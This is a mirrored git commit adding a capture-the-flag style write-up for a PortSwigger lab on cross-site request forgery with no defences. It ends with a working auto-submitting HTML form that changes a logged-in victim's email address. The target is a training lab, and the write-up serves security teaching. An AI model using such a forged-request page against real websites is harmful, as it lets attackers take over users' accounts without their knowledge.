mirror of
https://github.com/AbdullahRizwan101/CTF-Writeups
synced 2024-11-24 21:03:07 +00:00
Create Lab1.md
This commit is contained in:
parent
5e859397c5
commit
8471c4a923
1 changed files with 35 additions and 0 deletions
35
Portswigger/CSRF/Lab1.md
Normal file
35
Portswigger/CSRF/Lab1.md
Normal file
|
@ -0,0 +1,35 @@
|
|||
# Portswigger CSRF Lab - 1
|
||||
|
||||
## CSRF vulnerability with no defenses
|
||||
In this lab we have to perfrom CSRF (Cross Site Request Forgery) which allows a user to make unintentional requests like changing user's email address which is the objective of this lab
|
||||
|
||||
<img src="https://i.imgur.com/YmaHQoB.png"/>
|
||||
|
||||
We are given credentials to log into our account
|
||||
|
||||
<img src="https://i.imgur.com/6qHauWq.png"/>
|
||||
|
||||
We can update the email address from this page but this isn't the way we have to update it
|
||||
|
||||
<img src="https://i.imgur.com/A1papzn.png"/>
|
||||
|
||||
If we look at the source code we can see the html for this form
|
||||
|
||||
<img src="https://i.imgur.com/IXAAA6q.png"/>
|
||||
|
||||
We have `Go to exploit ` server (I don't have it now since I have solved this lab) , so going to that we will have options like `store` , `exploit` ,`deliver exploit` and `access logs` so first we need to craf a csrf exploit for that we need to copy the same html form content and in `action` paramter we add the url with `/my-account/change-email`
|
||||
|
||||
```html
|
||||
<html>
|
||||
<body>
|
||||
<form action="https://ac771fae1eadea59c0730ef5005c00f2.web-security-academy.net/my-account/change-email" method="POST">
|
||||
<input required type="hidden" name="email" value="ez@swigger.com">
|
||||
</form>
|
||||
<script>
|
||||
document.forms[0].submit();
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
```
|
||||
|
||||
It's not necessary to make the input hidden but real csrf attacks like this where you don't see any input when you click a link and something happens in the back , so this request will make the email changed to ez@swigger.com and with this we completed this lab
|
Loading…
Reference in a new issue